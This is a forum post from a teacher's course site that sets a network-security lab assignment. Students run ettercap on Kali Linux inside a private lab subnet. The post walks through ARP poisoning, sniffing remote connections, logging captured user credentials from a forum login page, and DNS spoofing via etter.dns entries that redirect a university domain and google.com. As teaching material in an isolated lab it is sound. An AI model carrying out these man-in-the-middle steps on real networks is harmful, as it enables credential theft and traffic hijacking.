施勢帆老師的教學網站

 找回密碼
 立即註冊
搜索
熱搜: 活動 交友 discuz
查看: 642|回復: 0

ettercap 網路攻擊軟體 -- 作業八 ettercap 網路攻擊

[複製鏈接]

609

主題

619

帖子

2897

積分

管理員

Rank: 9Rank: 9Rank: 9

積分
2897
發表於 2022-2-21 12:06:15 | 顯示全部樓層 |閱讀模式
kali linux 系統ettercap命令使用方法

[實戰] ARP欺騙、用劫持的Session登入

使用Ettercap实现DNS欺骗


作業 :

IP 設定 (A班學號末3碼, 隨修學號末2碼)
ex: 107103101
WIN 10 192.168.xxx.1    ---> 192.168.101.1
Kali Linux 192.168.xxx.xxx    ---> 192.168.101.101
Gateway 192.168.xxx.254    ---> 192.168.101.254

A. Win10 修改網路設定
IP Address : 192.168.101.1
netmask 255.255.255.0  
Gateway : 192.168.101.254
DNS : 168.95.1.1


B. 使用 Vmware Workstation --> Kali
login : root
passwdord : 123456
開啟終端機

ifconfig eth0 192.168.101.101 netmask 255.255.255.0
route add default gw 192.168.101.254

mkdir ettercap.log
cd ettercap.log
touch user
chmod 666 user

ettercap  
--> Sniff  --> Unified Sniffing  --> eth0
--> Hosts --> Scan for hosts --> Hosts list --> Add to Taget 1 and Target 2
--> Mitm --> ARP poisoning --> Sniff remote connections.
--> Plugins --> Manage the plugins --> dns_spoof
--> Logging --> Log user messages... --> /root/ettercap.log/user
--> Start --> Start sniffing


Wireshark

作業圖

http://www01.eyny.com/member.php?mod=logging&action=login

arp -a







gedit /root/ettercap.log/user



gedit /etc/ettercap/etter.dns

*.aeust.edu.tw        A   120.96.56.3
*.aeust.edu.tw        PTR 120.96.56.3
      
google.com        A   192.168.3.1xx+50
google.com        PTR 192.168.3.1xx+50



https://null-byte.wonderhowto.co ... d-sslstrip-0165933/



本帖子中包含更多資源

您需要 登錄 才可以下載或查看,沒有帳號?立即註冊

x
回復

使用道具 舉報

您需要登錄後才可以回帖 登錄 | 立即註冊

本版積分規則

Archiver|手機版|小黑屋|施勢帆老師的教學網站

GMT+8, 2024-11-22 17:35 , Processed in 0.039692 second(s), 19 queries .

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回復 返回頂部 返回列表